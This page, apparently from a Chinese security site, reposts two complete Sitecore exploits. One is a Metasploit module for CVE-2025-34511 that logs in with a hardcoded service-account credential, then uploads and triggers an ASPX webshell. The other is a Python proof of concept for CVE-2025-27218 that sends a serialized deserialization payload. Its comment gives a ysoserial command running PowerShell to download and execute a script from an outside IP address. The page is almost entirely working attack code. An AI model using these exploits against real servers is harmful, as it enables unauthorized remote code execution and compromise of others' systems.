Sitecore XP 后认证文件上传漏洞技术分析

Mon, 12 Jan 2026 01:06:40 +0800

Sitecore XP 后认证文件上传

2025.09.14 作者： Piotr Bazydlo

风险等级： 高 本地利用： 否 远程利用： 是 CVE编号： CVE-2025-34511 CWE编号： N/A

##
# 此模块需要 Metasploit：https://metasploit.com/download
# 当前源代码：https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::SitecoreXp
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sitecore XP CVE-2025-34511 后认证文件上传',
        'Description' => %q{
          此模块利用 CVE-2025-34511，这是 PowerShell 扩展中的一个文件上传漏洞。该模块还利用 CVE-2025-34509（ServicesAPI 账户的硬编码凭证）来获得初始访问权限。
        },
        'License' => MSF_LICENSE,

        'Author' => [
          'Piotr Bazydlo', # 发现者
          'msutovsky-r7' # 模块创建者
        ],
        'References' => [
          [ 'CVE', '2025-34511' ],
          ['URL', 'https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform'],
          ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667']
        ],
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Windows',
            {
              'Arch' => [ARCH_X86, ARCH_X64]
            }
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'DisclosureDate' => '2025-06-17',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, '易受攻击端点的路径', '/']),
    ])
  end

  def check
    return Exploit::CheckCode::Unknown('无法登录，应用程序可能不是 Sitecore') unless login_identitysrv('ServicesAPI', 'b')

    @is_logged = true

    return Exploit::CheckCode::Safe('无法获取提升权限的 cookies') unless get_identity_cookies

    @is_elevated = true

    sitecore_version = get_version

    res = send_request_cgi({
      'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'),
      'method' => 'GET',
      'vars_get' => { 'hdl' => '1245516121' }
    })

    return Exploit::CheckCode::Safe('未检测到 PowerShell 扩展，目标 Sitecore 实例中可能未安装') unless res&.code == 200

    return Exploit::CheckCode::Vulnerable("检测到 Sitecore 版本为 #{sitecore_version}，该版本存在漏洞") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4'))

    Exploit::CheckCode::Safe("检测到 Sitecore 版本为 #{sitecore_version}，该版本不存在漏洞")
  end

  def upload_webshell
    @webshell = "#{Rex::Text.rand_text_alpha(15)}.aspx"
    @item_uri = Rex::Text.rand_text_alpha(8)
    exe = generate_payload_exe
    asp = Msf::Util::EXE.to_exe_aspx(exe)

    data_post = Rex::MIME::Message.new
    data_post.add_part(@item_uri, nil, nil, %(form-data; name="ItemUri"))
    data_post.add_part('en', nil, nil, %(form-data; name="LanguageName"))
    data_post.add_part('0', nil, nil, %(form-data; name="Overwrite"))
    data_post.add_part('0', nil, nil, %(form-data; name="Unpack"))
    data_post.add_part('en', nil, nil, %(form-data; name="Versioned"))
    data_post.add_part(asp, 'text/plain', nil, %(form-data; name="#{@item_uri}"; filename="#{@webshell}"))

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'),
      'vars_get' => { 'hdl' => '1245516121' },
      'data' => data_post.to_s,
      'ctype' => "multipart/form-data; boundary=#{data_post.bound}"
    })

    return false unless res&.code == 200

    true
  end

  def trigger_webshell
    send_request_cgi({
      'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', @item_uri, @webshell),
      'method' => 'GET'
    })
  end

  def exploit
    if !@is_logged && !login_identitysrv('ServicesAPI', 'b')
      fail_with(Failure::NoAccess, '登录失败，请检查凭证')
    end

    if !@is_elevated && !get_identity_cookies
      fail_with(Failure::Unknown, '获取提升权限的 cookies 失败')
    end

    fail_with(Failure::PayloadFailed, '上传 webshell 失败') unless upload_webshell

    trigger_webshell
  end
end

Sitecore 10.4 远程代码执行（RCE）漏洞利用详解

Sat, 20 Sep 2025 13:19:45 +0800

Exploit Title: Sitecore 10.4 - Remote Code Execution (RCE)

Exploit Author: Yesith Alvarez

Vendor Homepage: https://developers.sitecore.com/downloads

Version: Sitecore 10.3 - 10.4

CVE : CVE-2025-27218

Link: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py

from requests import Request, Session
import sys
import base64


def title():
    print('''
    
   _______      ________    ___   ___ ___  _____     ___ ______ ___  __  ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \____  |__ \/_ |/ _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) |  / /   ) || | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ /  / /   / / | |> _ < 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ / /   / /_ | | (_) |
  \_____|   \/   |______|  |____|\___/____|____/    |____/_/   |____||_|\___/ 
                                                                              
                                                                              
[+] Remote Code Execution                                                                                                                                                                                    
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py
    ''')   

def exploit(url):
# This payload must be generated externally with ysoserial.net
# Example:  ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe -nop -w hidden -c 'IEX(New-Object Net.WebClient).DownloadString(\"http://34.134.71.169/111.html\")'"
    payload = 'AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA2ApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBb3dZOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUhCdmQyVnljMmhsYkd3dVpYaGxJQzF1YjNBZ0xYY2dhR2xrWkdWdUlDMWpJQ2RKUlZnb1RtVjNMVTlpYW1WamRDQk9aWFF1VjJWaVEyeHBaVzUwS1M1RWIzZHViRzloWkZOMGNtbHVaeWdtY1hWdmREc2dhSFIwY0Rvdkx6RXdMakV3TGpFd0xqRXdMekV4TVM1b2RHMXNYQ2tuSWlCVGRHRnVaR0Z5WkVWeWNtOXlSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJUZEdGdVpHRnlaRTkxZEhCMWRFVnVZMjlrYVc1blBTSjdlRHBPZFd4c2ZTSWdWWE5sY2s1aGJXVTlJaUlnVUdGemMzZHZjbVE5SW50NE9rNTFiR3g5SWlCRWIyMWhhVzQ5SWlJZ1RHOWhaRlZ6WlhKUWNtOW1hV3hsUFNKR1lXeHpaU0lnUm1sc1pVNWhiV1U5SW1OdFpDSWdMejROQ2lBZ0lDQWdJRHd2YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnUEM5elpEcFFjbTlqWlhOelBnMEtJQ0E4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2k1UFltcGxZM1JKYm5OMFlXNWpaVDROQ2p3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeVBncz0L'
    payload_encoded = payload
    headers = {'Thumbnailsaccesstoken': payload_encoded}
    s = Session()

    req = Request('GET', url, headers=headers)
    prepped = req.prepare()
    resp = s.send(prepped, verify=False, timeout=15)

    print(prepped.headers)
    print(url)
    print(resp.status_code)
    print(resp.text)


if __name__ == '__main__':
    title()
    if len(sys.argv) < 2:
        print('[+] USAGE: python3 %s https://<target_url>\n' % sys.argv[0])
        print('[+] Example: python3 %s https://192.168.0.10\n' % sys.argv[0])
        exit(0)
    else:        
        exploit(sys.argv[1])

Sitecore on 办公AI智能小助手

Sitecore XP 后认证文件上传漏洞技术分析

Sitecore XP 后认证文件上传

Sitecore 10.4 远程代码执行（RCE）漏洞利用详解

Exploit Title: Sitecore 10.4 - Remote Code Execution (RCE)

Exploit Author: Yesith Alvarez

Vendor Homepage: https://developers.sitecore.com/downloads

Version: Sitecore 10.3 - 10.4

CVE : CVE-2025-27218

Link: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py